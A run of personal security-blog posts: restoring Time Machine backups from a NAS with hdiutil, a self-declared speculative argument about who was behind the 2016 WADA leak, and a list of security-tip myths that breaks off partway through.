By default, Time Machine is one of the best and easiest backup solutions I have seen. As long as you stick to the default use case, where you have one active backup disk, life is pink and happy. But this was not my case.<br />
<br />
As always, I started to Google what I should do. One of the first options recommended that I add the backup disk to Time Machine, and it would automagically show the backup snapshots from the old backup. Instead, it did not show the old snapshots but started to create a new backup. Panic button pressed, backup canceled, back to Google.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_OV1TVoxehJnx2rzK7azkDdFqm5KrDKYqYq69RMMPajvAlfKm2zW1yh5NL2YXIlD2ulfeoxghyphenhyphena-RWne3f_ryBuxrVetSAk8ijEOyEDkMfXUN21nrTasLVgJ4pGGFUn8mmuCGSFA4rVU/s1600/use-additional-backup-drive-time-machine.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="321" data-original-width="516" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp_OV1TVoxehJnx2rzK7azkDdFqm5KrDKYqYq69RMMPajvAlfKm2zW1yh5NL2YXIlD2ulfeoxghyphenhyphena-RWne3f_ryBuxrVetSAk8ijEOyEDkMfXUN21nrTasLVgJ4pGGFUn8mmuCGSFA4rVU/s320/use-additional-backup-drive-time-machine.jpeg" width="320" /></a></div>
<br />
<br />
Other tutorials recommend clicking on the Time Machine icon while pressing the alt (Option) key, where I can choose "Browse other backup disks". But this did not list the old Time Machine backup. It did list the backup when selecting disks in Time Machine preferences, but I had already tried and failed that way.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbdgjhgLXYK3zIFUKqmXDgfsOjymkHYrlsuX6AizHffsVvkj9tthL-bV8fQnkqkc9Tzv8Hu7QGzdtM5_chUbvQ0bXjn-biUqJuWvvW5_b5fuGctjxzWvXkA7nUX2KGuC5TB5cIpBvw1xD/s1600/browse-additional-backup-disks.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="191" data-original-width="437" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinbdgjhgLXYK3zIFUKqmXDgfsOjymkHYrlsuX6AizHffsVvkj9tthL-bV8fQnkqkc9Tzv8Hu7QGzdtM5_chUbvQ0bXjn-biUqJuWvvW5_b5fuGctjxzWvXkA7nUX2KGuC5TB5cIpBvw1xD/s320/browse-additional-backup-disks.jpeg" width="320" /></a></div>
<br />
<br />
YAT (yet another tutorial) recommended SSHing into the NAS and browsing the backup disk, as it is just a simple directory where I can see all the files. But all the files inside were just a bunch of nonsense, no real directory structure.<br />
<br />
YAT (yet another tutorial) recommended that I can just easily browse the content of the backup from the Finder by double-clicking on the sparse bundle file. After clicking on it, I can see the disk image on the left side of the Finder, attached as a new disk.<br />
Well, this is true, but because of some bug, when you connect to the Time Capsule, you don't see the sparse bundle file. And I got inconsistent results: for the WD NAS, double-clicking on the sparse bundle did nothing. For the Time Capsule, it did work.<br />
At this point, I had to leave the location where the backup was present, and I only had remote SSH access. You know, if you can't solve a problem, let's complicate things by restricting your options.<br />
Finally, I tried to check out some data forensics blogs, and besides some expensive tools, I could find the solution.<br />
<h2>
The solution</h2>
Finally, a <a href="https://d4rkw1ll0w4n6.wordpress.com/2015/02/12/timemachine-4n6/" target="_blank">blog post</a> provided the real solution - hdiutil.<br />
The best part of hdiutil is that you can provide the read-only flag to it. This can be very awesome when it comes to forensics acquisition.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbVdgQe67dIzAGnBk63Z1Lt0uKLZHmm537-Vwt6c9jMrmQ8u18bByT5vUVFsvdnivqr_UvMjcmccjEPg-sxp81V51WpXd-nZZ6fdtrzazmSaKtMcc7zgASerCA_z84FXcc3iibf-bBzYiV/s1600/Screen+Shot+2018-07-19+at+09.54.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="389" data-original-width="1596" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbVdgQe67dIzAGnBk63Z1Lt0uKLZHmm537-Vwt6c9jMrmQ8u18bByT5vUVFsvdnivqr_UvMjcmccjEPg-sxp81V51WpXd-nZZ6fdtrzazmSaKtMcc7zgASerCA_z84FXcc3iibf-bBzYiV/s400/Screen+Shot+2018-07-19+at+09.54.50.png" width="400" /></a></div>
<br />
To mount any NAS via SMB:<br />
<pre class="prettyprint lang-bsh">mount_smbfs //<username>@<NAS_IP>/<Share_for_backup> /<mountpoint></pre>
<br />
To mount a Time Capsule share via AFP:<br />
<pre class="prettyprint lang-bsh">mount_afp afp://any_username:password@<Time_Capsule_IP>/<Share_for_backup> /<mountpoint></pre>
<br />
And finally this command should do the job:<br />
<pre class="prettyprint lang-bsh">hdiutil attach test.sparsebundle -readonly</pre>
<br />
It is nice that you can provide read-only parameter.<br />
<br />
If the backup was encrypted and you don't want to provide the password in a password prompt, use the following:<br />
<pre class="prettyprint lang-bsh">printf '%s' 'CorrectHorseBatteryStaple' | hdiutil attach test.sparsebundle -stdinpass -readonly</pre>
<br />
Note: if you receive the error "resource temporarily unavailable", probably another machine is backing up to the device.<br />
<br />
And now, you can find your backup disk under /Volumes. Happy restoring!<br />
<br />
Probably it would have been quicker to either enable the remote GUI, or to physically travel to the system and login locally, but that would spoil the fun.
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-6474516451487344064 2016-10-17T10:41:00.002+02:00 2019-10-08T15:35:24.222+02:00
<h2>Why (I believe) WADA was not hacked by the Russians</h2>
Disclaimer: This is my personal opinion. I am not an expert in attribution. But as it turns out, not many people in the world are good at attribution. I know this post lacks real evidence and is mostly based on speculation.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG99n-H_FvV8To_0cNCrlF63bvnu2V8T5k4h5oZmxt8Ac9K8q7_tXZr6K2ElKfcaMWZMX-HsgtRhZ6LJK3B0cg4GOnmjESUP-GgGFK_99XsIX0Ez0F0d7W2888Y6P5PxWV_FSegt5m0Rcf/s1600/wada.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG99n-H_FvV8To_0cNCrlF63bvnu2V8T5k4h5oZmxt8Ac9K8q7_tXZr6K2ElKfcaMWZMX-HsgtRhZ6LJK3B0cg4GOnmjESUP-GgGFK_99XsIX0Ez0F0d7W2888Y6P5PxWV_FSegt5m0Rcf/s320/wada.png" width="320" /></a></div>
<br />
<br />
Let's start with the main facts we know about the WADA hack, in chronological order:<br />
<br />
<br />
1. At some point in time (August - September 2016), the WADA database was hacked and exfiltrated<br />
<div>
2. August 15th, "WADA has alerted their stakeholders that email phishing scams are being reported in connection with WADA and therefore asks its recipients to be careful" <a href="https://m.paralympic.org/news/wada-warns-stakeholders-phishing-scams">https://m.paralympic.org/news/wada-warns-stakeholders-phishing-scams</a><br />
3. September 1st, the fancybear.net domain was registered<br />
<div>
<pre style="font-family: "Courier New", monospace; font-size: 13px;"> Domain Name: FANCYBEAR.NET
...
Updated Date: 18-sep-2016
Creation Date: 01-sep-2016</pre>
</div>
4. The content of the WADA hack has been published on the website<br />
5. The @FancyBears and @FancyBearsHT Twitter accounts have been created and started to tweet on 12th September, reaching out to journalists<br />
6. 12th September, Western media started headlines "Russia hacked WADA"</div>
<div>
7. The leaked documents have been altered, states WADA <a href="https://www.wada-ama.org/en/media/news/2016-10/cyber-security-update-wadas-incident-response">https://www.wada-ama.org/en/media/news/2016-10/cyber-security-update-wadas-incident-response</a><br />
<br />
<br />
<h3>
The Threatconnect analysis</h3>
The only technical analysis on why Russia was behind the hack can be read here: <a href="https://www.threatconnect.com/blog/fancy-bear-anti-doping-agency-phishing/">https://www.threatconnect.com/blog/fancy-bear-anti-doping-agency-phishing/</a><br />
<br />
After reading this, I was able to collect the following main points:<br />
<br />
<ol>
<li>It is Russia because Russian APT groups are capable of phishing</li>
<li>It is Russia because the phishing site "wada-awa[.]org was registered and uses a name server from ITitch[.]com, a domain registrar that FANCY BEAR actors recently used"</li>
<li>It is Russia because "Wada-arna[.]org and tas-cass[.]org were registered through and use name servers from Domains4bitcoins[.]com, a registrar that has also been associated with FANCY BEAR activity."</li>
<li>It is Russia, because "The registration of these domains on August 3rd and 8th, 2016 are consistent with the timeline in which the WADA recommended banning all Russian athletes from the Olympic and Paralympic games."</li>
<li>It is Russia, because "The use of 1&1 mail.com webmail addresses to register domains matches a TTP we previously identified for FANCY BEAR actors."</li>
</ol>
<br />
There is an interesting side-track in the article, the case of the @anpoland account. Let me deal with this at the end of this post.<br />
<br />
My problem with the above points is that all five flags were publicly accessible to anyone as TTPs of Fancy Bear. And meanwhile, all five are weak evidence. Any script kittie in the world is capable of both hacking WADA and planting these false flags.<br />
<br />
Stronger evidence than these weak pieces would be:<br />
<br />
<ul>
<li>Malware sharing same code attributed to Fancy Bear (where the code is not publicly available or circulating on hackforums)</li>
<li>Private servers sharing the IP address with previous attacks attributed to Fancy Bear (where the server is not a hacked server or a proxy used by multiple parties)</li>
<li>E-mail addresses used to register the domain attributed to Fancy Bear</li>
<li>Many other things</li>
</ul>
<div>
For me, it is quite strange that after such <a href="https://www.threatconnect.com/blog/guccifer-2-0-dnc-breach/" target="_blank">great analysis on Guccifer 2.0</a>, the Threatconnect guys came up with this low-value post. </div>
<div>
<br /></div>
<br />
<h3>
The fancybear website</h3>
It is quite unfortunate that the analysis was not updated after the documents had been leaked. But let's just have a look at the fancybear . net website, shall we?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SIb9px9ehyphenhyphenivaxJDN-0wj_MMikxAzUBuXmIyfEI4NAAP7AtJqfwEmUHmqQE4RvuAIa7v47LuZH9w_UHJDDZAcVxOZcBBjSr1srW8ibXvLVHs33YZ9uZczlb2sJ87qkoM-xLnacL0I7ux/s1600/screencapture-fancybear-net-1476519267721.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SIb9px9ehyphenhyphenivaxJDN-0wj_MMikxAzUBuXmIyfEI4NAAP7AtJqfwEmUHmqQE4RvuAIa7v47LuZH9w_UHJDDZAcVxOZcBBjSr1srW8ibXvLVHs33YZ9uZczlb2sJ87qkoM-xLnacL0I7ux/s400/screencapture-fancybear-net-1476519267721.png" width="130" /></a></div>
<br />
Now the question is, if you are a Russian state-sponsored hacker group, and you are already accused of the hack itself, do you create a website with tons of bears on it, and do you choose the same name (Fancy Bear) for your "Hack team" that is already used by Crowdstrike to refer to a Russian state-sponsored hacker group? Well, for me, it makes no sense. Now I can hear people screaming: "The Russians changed tactics to confuse us". Again, it makes no sense to change tactics on this, while keeping tactics on the "evidence" found by Threatconnect.<br />
<br />
It makes sense that a Russian state-sponsored group creates a fake persona, names it Guccifer 2.0, pretends Guccifer 2.0 is from Romania, but in the end it turns out Guccifer 2.0 isn't a native Romanian speaker. That really makes sense.<br />
<br />
What happens when someone creates this fancybear website for leaking the docs, and from the Twitter account reaches out to the media? Journalists check the website, they see it was done by Fancy Bear, they <strike>Bing</strike> Google this name, and clearly see it is a Russian state-sponsored hacker group. Some journalists also found the Threatconnect report, which seems very convincing for the first read. I mean, it is a work of experts, right? So you can write in the headlines that the hack was done by the Russians.<br />
<br />
Just imagine an expert in the USA or Canada writing in a report for WADA:<br />
"the hack was done by non-Russian, but state-sponsored actors, who planted a lot of false-flags to accuse the Russians and to destroy confidence in past and future leaks". Well, I am sure this is not a popular opinion, and whoever tries this, risks his career. Experts are human, subject to all kinds of bias.<br />
<br />
<h3>
The Guardian</h3>
The only other source I was able to find is from The Guardian, where not just one side (it was Russia) was represented in the article. It is quite unfortunate that both experts are from Russia, so people from the USA will say they are not objective on the matter. But the fact that they are Russian experts does not mean they are wrong ...<br />
<br />
<a href="https://www.theguardian.com/sport/2016/sep/15/fancy-bears-hackers--russia-wada-tues-leaks">https://www.theguardian.com/sport/2016/sep/15/fancy-bears-hackers--russia-wada-tues-leaks</a><br />
<br />
Sergei Nikitin:<br />
“We don’t have this in the case of the DNC and Wada hacks, so it’s not clear on what basis conclusions are being drawn that Russian hackers or special services were involved. It’s done on the basis of the website design, which is absurd,” he said, referring to the depiction of symbolically Russian animals, brown and white bears, on the “Fancy Bears’ Hack Team” website.<br />
<br />
I don't agree with the DNC part, but this is not the topic of conversation here.<br />
<br />
Alexander Baranov:<br />
"the hackers were most likely amateurs who published a “semi-finished product” rather than truly compromising information. “They could have done this more harshly and suddenly,” he said. “If it was [state-sponsored] hackers, they would have dug deeper. Since it’s enthusiasts, amateurs, they got what they got and went public with it.”"<br />
<br />
<h3>
The @anpoland side-track</h3>
First please check the tas-cas.org hack <a href="https://www.youtube.com/watch?v=day5Aq0bHsA" target="_blank">https://www.youtube.com/watch?v=day5Aq0bHsA</a>, I will be here when you have finished it. This is the website of the Court of Arbitration for Sport, and referring to the Threatconnect post, "CAS is the highest international tribunal that was established to settle disputes related to sport through arbitration. Starting in 2016, an anti-doping division of CAS began judging doping cases at the Olympic Games, replacing the IOC disciplinary commission." Now you can see why this attack is also discussed here.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSWeSEyy6aiIoM5xkygPpmgXNcf3_5HL9ywgn7wFoFIv6kTpVmzsxVvbbOt57bzuJs2vBqhezuUbn28WcLRFK_hIOfFlrNucmR1_XDU5YTg3jNGySY2VPLxLSWFw_N-lfC9ags3Q-6zsy/s1600/anpoland.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSWeSEyy6aiIoM5xkygPpmgXNcf3_5HL9ywgn7wFoFIv6kTpVmzsxVvbbOt57bzuJs2vBqhezuUbn28WcLRFK_hIOfFlrNucmR1_XDU5YTg3jNGySY2VPLxLSWFw_N-lfC9ags3Q-6zsy/s320/anpoland.png" width="320" /></a></div>
<br />
<br />
<ul>
<li>My bet is that this machine was set up for these @anpoland videos only. Whether google.ru is a false flag or real is hard to decide. It is interesting to see that there is no Google search done via google.ru; it is used only once. </li>
<li>The creator of the video can't double click. Is it because he has a malfunctioning mouse? Is it because he uses a virtualization console, which is near-perfect OPSEC to hide your real identity? My personal experience is that using virtualization consoles remotely (e.g. RDP) has very similar effects to what we can see on the video. </li>
<li>The timeline of the Twitter account is quite strange, registered in 2010</li>
<li>I agree with the Threatconnect analysis that this @anpoland account is probably a faketivist, and not an activist. But who is behind it, remains a mystery. </li>
<li>Either the "activist" is using a Whonix-like setup for remaining anonymous, or a TOR router (something like <a href="https://makezine.com/projects/browse-anonymously-with-a-diy-raspberry-pi-vpntor-router/" target="_blank">this</a>), or does not care about privacy at all. Looking at the response times (SQLmap, web browser), I doubt this "activist" is behind anything related to TOR, which makes no sense for an activist who publishes his hack on YouTube. People are stupid for sure, but this does not add up. It makes more sense that this was a server (paid with bitcoins or stolen credit cards or whatever) rather than a home computer.</li>
</ul>
<div>
For me, this whole @anpoland thing makes no sense, and I think it is just loosely connected to the WADA hack. </div>
<br />
<h3>
The mysterious Korean characters in the HTML source</h3>
<div>
There is another interesting flag in the whole story, which actually makes no sense. When the website was published, there were Korean characters in HTML comments. </div>
<div>
<a href="https://web.archive.org/web/20160913013727/http://fancybear.net/">https://web.archive.org/web/20160913013727/http://fancybear.net/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5aJazC820r4MWl6HHjk8G0si1ShqC78JB_kyKbEqaQqD0420aXz2I2Ip49kWKkpPDyJlDqjWOg775J-sFEcf5TurvYEswLiEvtTifI3qXW9Cf8OfTZoydwOG8Ira1Vz7g9Q9KNkpLxRc/s1600/korean1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5aJazC820r4MWl6HHjk8G0si1ShqC78JB_kyKbEqaQqD0420aXz2I2Ip49kWKkpPDyJlDqjWOg775J-sFEcf5TurvYEswLiEvtTifI3qXW9Cf8OfTZoydwOG8Ira1Vz7g9Q9KNkpLxRc/s320/korean1.png" width="320" /></a></div>
<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
When someone pointed this out on Twitter, these Korean HTML comments disappeared:</div>
<div>
<a href="https://web.archive.org/web/20160914231209/http://www.fancybear.net/">https://web.archive.org/web/20160914231209/http://www.fancybear.net/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGy3sl1TABE29tC197UqZX7j_0krjYYQKNTcvBy6japNt3QQGG2rUQcrMD4DEHsheuT6i7DTYp04rc6p9PIjzgFrC-3qj_FiKUFNkMXOalh026GxgB94wjPx1MuJfbpN6p7F_aPMPw81Z/s1600/korean2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGy3sl1TABE29tC197UqZX7j_0krjYYQKNTcvBy6japNt3QQGG2rUQcrMD4DEHsheuT6i7DTYp04rc6p9PIjzgFrC-3qj_FiKUFNkMXOalh026GxgB94wjPx1MuJfbpN6p7F_aPMPw81Z/s320/korean2.png" width="320" /></a></div>
<div>
These HTML comments look like generated HTML comments, from a WYSIWYG editor, which is using the Korean language. Let me know if you can identify the editor.</div>
<div>
<br /></div>
<h3>
The Russians are denying it</h3>
<div>
Well, what choice do they have? It does not matter whether they did this or not, they will deny it. And they can't deny it any other way. Just imagine a spokesperson: "Previously we have falsely denied the DCC and DNC hacks, but this time please believe us, this wasn't Russia." Sounds plausible ...<br />
<br /></div>
<h3>
Attribution</h3>
Let me sum up what we know:<br />
<br />
It makes sense that the WADA hack was done by Russia, because:<br />
<br />
<ol>
<li>With Russia almost banned from the Olympics due to the doping scandal, it made sense to discredit WADA and US Olympians</li>
<li>There are multiple (weak) pieces of evidence which point to Russia</li>
</ol>
<div>
It makes sense that the WADA hack was not done by Russia, because: </div>
<div>
<ol>
<li>By instantly attributing the hack to the Russians, the story became more about discrediting Russia than discrediting WADA or US Olympians.</li>
<li>In reality, there was no gain for Russia from disclosing the documents. Nothing happened, nothing changed, no discredit for WADA. Not a single case turned out to be illegal or unethical.</li>
<li><strike>Altering the leaked documents makes no sense if it was Russia</strike> (see update at the end). Altering the leaked documents makes a lot of sense if it was not Russia. Because from now on, people can always state "these leaks cannot be trusted, so it is not true what is written there". It is quite cozy for any US organization which has been hacked or will be hacked. If you are interested in the "Russians forging leaked documents" debate, I highly recommend starting with this <a href="https://theintercept.com/2016/10/11/in-the-democratic-echo-chamber-inconvenient-truths-are-recast-as-putin-plots/" target="_blank">The Intercept</a> article</li>
<li>If the Korean characters were false flags planted by the Russians, why would they remove them? If they had been Russian characters, I would understand removing them.</li>
<li>All evidence against Russia is weak and could easily be forged by any script kittie.</li>
</ol>
<div>
<br /></div>
I don't like guessing, but here is my guess. This WADA hack was an operation of a (non-professional) hackers-for-hire service, paid for by an enemy of Russia. The goal was to hack WADA, leak the documents, modify some contents in the documents, and blame it all on the Russians ...<br />
<br />
<h3>
Questions and answers</h3>
</div>
<div>
<ul>
<li>Was Russia capable of doing this WADA hack? Yes.</li>
<li>Was Russia hacking WADA? Maybe yes, maybe not.</li>
<li>Was this leak done by a Russian state-sponsored hacker group? I highly doubt that.</li>
<li>Is it possible to buy an attribution die where all six sides are Russia? No, it is sold out. </li>
</ul>
</div>
<div>
<br /></div>
<div>
To quote Patrick Gray: "Russia is the new China, and the Russians ate my homework."©</div>
<div>
<br /></div>
<div>
Let me know what you think about this, and please comment. </div>
<div>
<br /></div>
<div>
Update: As TheGrugq pointed out, Guccifer has been found to have altered documents <a href="https://www.reddit.com/r/EnoughTrumpSpam/comments/4uyih3/russian_hackers_altered_emails_before_release_to/?st=IUJDLSIE&sh=e195e908" style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, helvetica, arial, sans-serif;">https://www.reddit.com/r/EnoughTrumpSpam/comments/4uyih3/russian_hackers_altered_emails_before_release_to/?st=IUJDLSIE&sh=e195e908</a></div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-13641171423327421442016-06-11T14:56:00.000+02:002019-10-08T15:36:22.000+02:00One reason why InfoSec sucked in the past 20 years - the "security tips" myth<div style="text-align: justify;">
From time to time, I get disappointed by how much effort and money is put into securing computers, networks, mobile phones, ... and yet in 2016 here we are, where not much has changed on the defensive side. There are many things I personally blame for this situation, and one of them is security tips.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The goal of these security tips is that if the average user follows these easy-to-remember rules, their computer will be safe. Unfortunately, by the time people integrate these rules into their daily life, the rules have either become outdated, or they were so oversimplified that they were never true in the first place. Some of these security tips might sound ridiculous to people in InfoSec nowadays, but this is exactly what people still remember, because we told them so for years.</div>
<h3 style="text-align: justify;">
PDF is safe to open</h3>
<div style="text-align: justify;">
This is an oldie. I think this started at the time of macro viruses. Still, people think opening a PDF from an untrusted source is safer than opening a Word file. For details on why this is not true, check: https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-497/Adobe-Acrobat-Reader.html</div>
<div style="text-align: justify;">
On an unrelated note, people still believe PDF is integrity protected because the content cannot be changed (compared to a Word document).</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbrVz8Zrs5VzozDjnxzndT9E6QLrMjPLD5dAggrCCjHFb4jjLSMTk4ZK8uvqMuDLx6shO2HJzfN44PpJoUc17z6mzgmZH1Qse60WLxbeUDZhAwk7szS9gRF2SDmJrOc4eFUHwQkY4Ww536/s1600/pdf_blog_title.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbrVz8Zrs5VzozDjnxzndT9E6QLrMjPLD5dAggrCCjHFb4jjLSMTk4ZK8uvqMuDLx6shO2HJzfN44PpJoUc17z6mzgmZH1Qse60WLxbeUDZhAwk7szS9gRF2SDmJrOc4eFUHwQkY4Ww536/s200/pdf_blog_title.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image stolen from Kaspersky</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Java is secure</h3>
<div>
<div style="text-align: justify;">
One of the best ones. Oracle started marketing Java as a safe language, where buffer overflows, format strings and pointer-based vulnerabilities are gone. Unfortunately, they forgot to tell the world that instead of "unsafe programs developed by others" they installed their unsafe program on 3 billion devices. </div>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7zOEyY3L5mCbvWhMgvq2IfJeH72viTvWcsnxommhRW-USDY7Ggkn7Qv57DAS0aTsLbNGBoLw6sNNQ1EflwMiS2NaI9xnNlwHkYCRRwysdc0O_orOGzxPv7feGLgGCER42xSXsuz1FmZt/s1600/Jteqd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7zOEyY3L5mCbvWhMgvq2IfJeH72viTvWcsnxommhRW-USDY7Ggkn7Qv57DAS0aTsLbNGBoLw6sNNQ1EflwMiS2NaI9xnNlwHkYCRRwysdc0O_orOGzxPv7feGLgGCER42xSXsuz1FmZt/s200/Jteqd.png" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Stay away from rogue websites and you will be safe</h3>
<div style="text-align: justify;">
This is a very common belief I hear from average people. "I only visit some trusted news sites and social media, I never visit those shady sites." I have some bad news. In the age of <a href="https://www.google.com/search?q=malvertising" target="_blank">malvertising </a>and infected websites, you don't have to visit those shady sites anymore to get infected.</div>
<h3 style="text-align: justify;">
Don't use open WiFi</h3>
<div style="text-align: justify;">
I have a very long explanation of why this makes no sense, see <a href="http://jumpespjump.blogspot.hu/2015/07/mythbusters-is-open-unencrypted-wifi.html" target="_blank">here</a>. Actually, the whole recommendation makes no sense as people will connect to public WiFis, no matter what we (InfoSec) recommend.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaSU6bMLQ0T61-W45zIZrkmvRlCHtgsRgzD-j6JWs7CBnb9al74DqK8EMFD3zW2PXxZ5eDbjiTfsTEu88R7DD3O2HQAEFQDJ8Wn5jiqP43SmzcSWDRH3AA7RbM7_dz1Y39OL1zPhb_g9t2/s1600/205975-free_wifi_wireless_original.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaSU6bMLQ0T61-W45zIZrkmvRlCHtgsRgzD-j6JWs7CBnb9al74DqK8EMFD3zW2PXxZ5eDbjiTfsTEu88R7DD3O2HQAEFQDJ8Wn5jiqP43SmzcSWDRH3AA7RbM7_dz1Y39OL1zPhb_g9t2/s200/205975-free_wifi_wireless_original.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
The password policy nightmare</h3>
<div style="text-align: justify;">
Actually, this topic has been covered by myself in two blog posts, see <a href="http://jumpespjump.blogspot.hu/2014/10/change-passwords-regularly-myth-and-lie.html" target="_blank">here </a>and <a href="http://jumpespjump.blogspot.hu/2014/10/change-passwords-regularly-myth-and-lie_13.html" target="_blank">here</a>. Long story short: use a password manager and 2-factor authentication wherever possible. Let the password manager choose the password for you. And last but not least, corporate password policy sux.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH_S8D73Zef5WBaMX2Mq733LvUsDtLLtKpeAe0xV4XlmZTNVOUm3wVIfiUPcM0G9ko3HB2bTjIG1qfOcqhOcrw5Enb5BFLj_MeQimDjFUQtYqxR23I6vEjKqIlun71Wkf5aPUfwQ158PMW/s1600/df826c798b30070ed3bbbe5dba776e35.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH_S8D73Zef5WBaMX2Mq733LvUsDtLLtKpeAe0xV4XlmZTNVOUm3wVIfiUPcM0G9ko3HB2bTjIG1qfOcqhOcrw5Enb5BFLj_MeQimDjFUQtYqxR23I6vEjKqIlun71Wkf5aPUfwQ158PMW/s200/df826c798b30070ed3bbbe5dba776e35.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Sites with a padlock are safe</h3>
<div>
<div style="text-align: justify;">
We have told people for years that communication with HTTPS sites is safe, and that you can be sure it is HTTPS by finding a randomly changing padlock icon somewhere next to the URL. What people hear is that sites with padlocks are safe. Whatever that means. The same goes for WiFi: a network with a padlock is safe.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb4BPok-1la3IGEeEpzLTDpybotQM-S-FLW12Zvfj1o0j949JpyaU3V_thZz8-e8b8i1IMUlv_J4eBQ9ZHSTF6oCsN2prxrlp5bAputWdZcyxSaKP21O6liTlQ-aEAqMEGqV_M_uj6b_At/s1600/computer-internet-security1-560x420.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb4BPok-1la3IGEeEpzLTDpybotQM-S-FLW12Zvfj1o0j949JpyaU3V_thZz8-e8b8i1IMUlv_J4eBQ9ZHSTF6oCsN2prxrlp5bAputWdZcyxSaKP21O6liTlQ-aEAqMEGqV_M_uj6b_At/s200/computer-internet-security1-560x420.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Use Linux, it is free from malware</h3>
<div>
<div style="text-align: justify;">
For years people told Windows users that if only they used Linux, they wouldn't have so much malware. Thanks to Android, now everyone in the world can enjoy malware on his/her Linux machine.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17E8fnZno6fMUT_lyPa5HTrhtOQ4eRCuqzSGhq5JjZ5pZbmq9L5xknoX9BTURqHGjTj3wvW_-fhSgxHWY-OJEr7SRjQI1scYggDIeONn6EI1eAL9VTJmcJAHbZJVEvfutJ6_zKi3SDN3O/s1600/android-evil.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17E8fnZno6fMUT_lyPa5HTrhtOQ4eRCuqzSGhq5JjZ5pZbmq9L5xknoX9BTURqHGjTj3wvW_-fhSgxHWY-OJEr7SRjQI1scYggDIeONn6EI1eAL9VTJmcJAHbZJVEvfutJ6_zKi3SDN3O/s200/android-evil.png" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
OSX is free from malware</h3>
<div>
<div style="text-align: justify;">
